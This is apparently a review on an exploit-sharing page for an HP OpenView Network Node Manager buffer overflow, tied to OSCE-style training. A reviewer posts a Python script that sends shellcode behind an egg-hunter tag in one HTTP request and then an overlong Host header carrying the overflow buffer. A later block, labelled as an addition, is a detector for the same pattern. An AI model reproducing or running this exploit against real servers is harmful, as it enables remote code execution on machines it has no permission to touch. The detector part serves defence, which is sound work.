HP Openview NNM Exploit - SEH/Egg Hunter 0x03

HP NNM Exploit - OSCE - HP Openview Network Node Manager Exploit

  1. Eng.Nour

Recent Reviews

  1. iammarx
    5/5,
    This is an alternative solution in order to avoid the truncation of the shellcode:
    I split the payload into two:

    The first one is a normal, legitimate HTTP message with the egg + shellcode + the stack alignment.

    The second one is the HTTP request that has the malicious buffer.


    import socket
    import time

    # Stack alignment stub placed between the egg tag and the shellcode
    #+"\x83\xc4\x02"

    # host, port, buffer and shellcode are defined earlier in the poster's
    # script (not shown in this review).

    # First request: well-formed, carries the egg tag + alignment + shellcode
    payload1 = (
    "GET /topology/home HTTP/1.1\r\n"
    "Host: 192.168.10.10:7510\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0\r\n\r\n"
    "w00tw00t" + "\x83\xc4\x01" + shellcode
    )

    # Second request: the overlong Host header holds the malicious buffer
    payload2 = (
    "GET /topology/home HTTP/1.1\r\n"
    "Host: " + buffer + ":7510\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0\r\n\r\n"
    )

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    print "[*] Sending Normal HPNNM Request"
    s.send(payload1)
    s.close()
    # Give the service time to process the first request before the second
    time.sleep(20)

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    print "[*] Sending EVIL HPNNM Request"
    s.send(payload2)
    s.close()
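A defender-side check for the two-stage pattern this review describes, added here as an example and not part of the original post or the exploit: it parses raw HTTP requests and flags the egg-hunter tag in a request body and an oversized or malformed Host header. The sample requests are constructed, and the Host length limit is an assumption.

```python
import re

# Egg-hunter marker named in the review above
EGG_TAG = b"w00tw00t"
# Assumed limit for host[:port]; anything longer is treated as suspicious
MAX_HOST_LEN = 253
HOST_RE = re.compile(rb"^[A-Za-z0-9.\-\[\]:]{1,253}$")


def parse_request(raw):
    """Split a raw HTTP request into (request line, headers dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def classify_request(raw):
    """Return a list of finding strings for one raw HTTP request."""
    request_line, headers, body = parse_request(raw)
    findings = []
    host = headers.get(b"host", b"")
    if len(host) > MAX_HOST_LEN:
        findings.append("oversized Host header (%d bytes)" % len(host))
    elif host and not HOST_RE.match(host):
        findings.append("Host header contains non-hostname bytes")
    if EGG_TAG in body:
        findings.append("egg-hunter tag in request body")
    if request_line.startswith(b"GET") and body:
        findings.append("GET request carries a body (%d bytes)" % len(body))
    return findings


# Constructed sample traffic (not captured from a real system)
BENIGN = (b"GET /topology/home HTTP/1.1\r\n"
          b"Host: 192.168.10.10:7510\r\n"
          b"User-Agent: example\r\n\r\n")
# Stage one: egg tag followed by placeholder bytes (int3, not shellcode)
STAGE1 = BENIGN + EGG_TAG + b"\xcc" * 16
# Stage two: arbitrary overlong Host header
STAGE2 = (b"GET /topology/home HTTP/1.1\r\n"
          b"Host: " + b"A" * 1000 + b":7510\r\n"
          b"User-Agent: example\r\n\r\n")

if __name__ == "__main__":
    for name, req in (("benign", BENIGN), ("stage1", STAGE1), ("stage2", STAGE2)):
        print(name, classify_request(req))
```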